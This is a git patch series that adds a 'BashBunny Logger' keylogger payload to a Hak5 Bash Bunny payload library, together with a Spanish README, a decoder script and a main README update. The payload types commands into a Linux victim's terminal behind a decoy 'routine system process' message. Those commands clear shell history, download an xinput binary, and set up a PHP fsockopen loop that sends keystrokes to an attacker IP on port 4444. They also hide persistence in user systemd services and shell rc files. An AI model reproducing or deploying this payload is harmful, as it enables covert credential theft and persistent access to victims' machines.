From f7ba3d36d9b980de13a1700fe38138dc9291fdf6 Mon Sep 17 00:00:00 2001 From: Genplat Date: Sun, 21 May 2023 18:30:09 +0200 Subject: [PATCH 1/4] Create payload.txt --- .../library/credentials/bb-logger/payload.txt | 98 +++++++++++++++++++ 1 file changed, 98 insertions(+) create mode 100644 payloads/library/credentials/bb-logger/payload.txt diff --git a/payloads/library/credentials/bb-logger/payload.txt b/payloads/library/credentials/bb-logger/payload.txt new file mode 100644 index 00000000..25cba785 --- /dev/null +++ b/payloads/library/credentials/bb-logger/payload.txt @@ -0,0 +1,98 @@ +#!/bin/bash +# +# Title: BashBunny Logger +# +# Description: +# Script By: +# -Genplat Dev 6-27 +# Join: discord.gg/elite6-27 +# +# Author: Genplat +# Version: 1.0 +# Category: Execution +# Target: Linux +# Attackmodes: HID and STORAGE +# +# STATUS +# =============== +# Magenta solid ................................... SETUP +# Yellow single blink ............................. ATTACK +# Yellow double blink ............................. STAGE2 +# Yellow triple blink ............................. STAGE3 +# Yellow quadruple blink .......................... STAGE4 +# White fast blink ................................ CLEANUP +# Green 1000ms VERYFAST blink followed by SOLID ... FINISH + +######## INITIALIZATION ######## + +readonly BB_LABEL="Loading" + +######## SETUP ######## + +LED SETUP + +ATTACKMODE HID +GET SWITCH_POSITION +udisk mount +RUN UNITY terminator +Q DELAY 600 +Q STRING # Proceso Rutinario Del Sistema. NO PULSE NINGUNA TECLA HASTA QUE TERMINE. + +######## ATTACK ######## + +LED ATTACK + +Q STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE +Q ENTER +Q STRING mkdir /var/tmp/.system +Q ENTER +Q STRING echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys +Q ENTER +Q STRING chmod +x /var/tmp/.system/sys +Q ENTER +Q STRING cd /var/tmp/.system/ +Q ENTER +Q STRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true +Q ENTER +Q STRING chmod +x xinput +Q ENTER +Q STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus +Q ENTER +Q STRING chmod +x /var/tmp/.system/systemBus +Q ENTER +Q STRING mkdir -p ~/.config/systemd/user +Q ENTER +Q STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service +Q ENTER +Q STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot +Q ENTER +Q STRING chmod +x /var/tmp/.system/reboot +Q ENTER +Q STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service +Q ENTER +Q STRING systemctl --user daemon-reload +Q ENTER +Q STRING systemctl --user enable --now systemBUS.service +Q ENTER +Q STRING systemctl --user start --now systemBUS.service +Q ENTER +Q STRING systemctl --user enable --now reboot.service +Q ENTER +Q STRING systemctl --user start --now reboot.service +Q ENTER +Q STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp +Q ENTER +Q STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit +Q ENTER + +######## CLEANUP ######## + +LED CLEANUP + +sync + +######## FINISH ######## + +LED FINISH + +shutdown -h 0 From a66ba8610fa6d71d8cc8f5897ce82b7bd03c110a Mon Sep 17 00:00:00 2001 From: Genplat Date: Sun, 21 May 2023 18:31:07 +0200 Subject: [PATCH 2/4] Create README.md --- .../library/credentials/bb-logger/README.md | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 payloads/library/credentials/bb-logger/README.md diff --git a/payloads/library/credentials/bb-logger/README.md b/payloads/library/credentials/bb-logger/README.md new file mode 100644 index 00000000..3ffdf71d --- /dev/null +++ b/payloads/library/credentials/bb-logger/README.md @@ -0,0 +1,30 @@ +# Bash Bunny KeyLogger +## Adapted from [duckylogger](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/credentials/DuckyLogger) +### NOVEDADES: +-Compatibilidad para bash bunny

+-100% en español

+-Un par de añadidos adicionales meramente esteticos

+ +### ¿Que es esto? + +Este es un payload para el [**bash bunny**](https://hak5.org/collections/hotplug-attack-tools/products/bash-bunny) de [**Hak5**](https://hak5.org) creado por **Genplat** (yo), el payload registra las pulsaciónes del teclado de la victima y las manda a los servidores que tu elijas, el mismo está basado en [duckylogger](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/credentials/DuckyLogger) y adaptado para funcionar en el bash bunny. + +### ¿Como se utiliza? + +#### Edita la IP en la linea `59` a la IP y puerto de tus servidores. + +### ¿Funciona? + +#### Debería funcionar, pero todavía no fue probado, unas horas despues de que este repo sea publicado se probará, recuerda, es **solo** para **Linux**. + +### Hecho por: + +#### [**Genplat**](https://github.com/Genplat) + +### ¡Dona! + + [![Patreon](https://img.shields.io/badge/Patreon-F96854?style=for-the-badge&logo=patreon&logoColor=white)](https://patreon.com/elite6_27) [![Ko-Fi](https://img.shields.io/badge/Ko--fi-F16061?style=for-the-badge&logo=ko-fi&logoColor=white)](https://ko-fi.com/elite6_27) + ##### **Bitcoin: 34MSaTHspfEwNdy13u6tQKSkqXhtJdGgfv** + + +> BunnyLogger: Una hora despues de publicar el repo me enteré de que existía [BunnyLogger](https://shop.hak5.org/blogs/payloads/bunnylogger), este repo, de **NINGUNA** manera fue creado en base al BunnyLogger, por lo cual, esto puede servir como una gran alternativa a el BunnyLogger, además, leyendo el código del **BunnyLogger** me di cuenta de que este requiere de montar el bash bunny, lo cual puede provocar algunos inconvenientes, este código NO monta el bash bunny. From 851364d4381ede9c6c1b879f30acc724bd50effb Mon Sep 17 00:00:00 2001 From: Genplat Date: Sun, 21 May 2023 18:32:03 +0200 Subject: [PATCH 3/4] Create BBLoggerDecoder --- .../credentials/bb-logger/BBLoggerDecoder | 50 +++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 payloads/library/credentials/bb-logger/BBLoggerDecoder diff --git a/payloads/library/credentials/bb-logger/BBLoggerDecoder b/payloads/library/credentials/bb-logger/BBLoggerDecoder new file mode 100644 index 00000000..2ac605f7 --- /dev/null +++ b/payloads/library/credentials/bb-logger/BBLoggerDecoder @@ -0,0 +1,50 @@ +usage () { + echo -e "BBLoggerDecoder decodifica las teclas pulsadas por el payload bblogger del bash bunny.\nCreado Por Genplat en base a duckylogger, el UNICO keylogger para el bash bunny." + echo -e "Uso: Decodificar log capturado:\t[./duckyLoggerDecoder -f -m -o ]"; + echo -e "\nOptions:" + echo -e "-f\tEspecifica el log." + echo -e "-m\tSeleccionar modo (normal|informative)" + echo -e "-o\tArchivo de output." + echo -e "-h\tPara ver este menú." +} +while getopts o:m:f:h: flag +do + case "${flag}" in + o) output=$OPTARG ;; + m) mode=$OPTARG ;; + f) filename=$OPTARG ;; + h) help=$OPTARG ;; + *) + usage + exit 1 + esac +done + +if [ -z "$output" ] && [ -z "$filename" ]; then + usage + exit 1 +fi +if [ -z "$filename" ]; then + echo -e "BBLoggerDecoder: Falta una opción \"-f\"(Archivo de log).\nUtiliza \"-h\" para mas información." >&2 + exit 1 +fi +if [ -z "$output" ]; then + echo -e "BBLoggerDecoder: Falta una opción \"-f\"(Archivo de log).\nUtiliza \"-h\" para mas información." >&2 + exit 1 +fi +if [ -z "$mode" ]; then + echo -e "BBLoggerDecoder: Falta una opción \"-f\"(Modo no especificado).\nUtiliza \"-h\" para mas información." >&2 + exit 1 +fi +if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then + echo -e "BBLoggerDecoder: Falta una opción \"-f\"(Modo invalido).\nUtiliza \"-h\" para mas información." >&2 + exit 1 +fi +if [ "$mode" == "normal" ] ; then + awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output + exit 1 +fi +if [ "$mode" == "informative" ] ; then + awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output + exit 1 +fi From 6e89ba5bcc602fcdbf67a0d1b2687c850bcd712d Mon Sep 17 00:00:00 2001 From: Genplat Date: Sun, 21 May 2023 18:36:42 +0200 Subject: [PATCH 4/4] Update README.md --- README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/README.md b/README.md index 257d1f1b..01c8a209 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,13 @@ # Payload Library for the Bash Bunny by Hak5 +### For spanish users: Por favor, comenta positivamente en [esta pull request](https://github.com/hak5/bashbunny-payloads/pull/583) para traer un payload español y este gran payload para el bash bunny al repositorio oficial de Hak5. + This repository contains payloads and extensions for the Hak5 Bash Bunny. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads. +## Ediciones + +- Se añadió el payload [bb-logger](https://github.com/Genplat/bb-logger) + ## About the Bash Bunny By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits.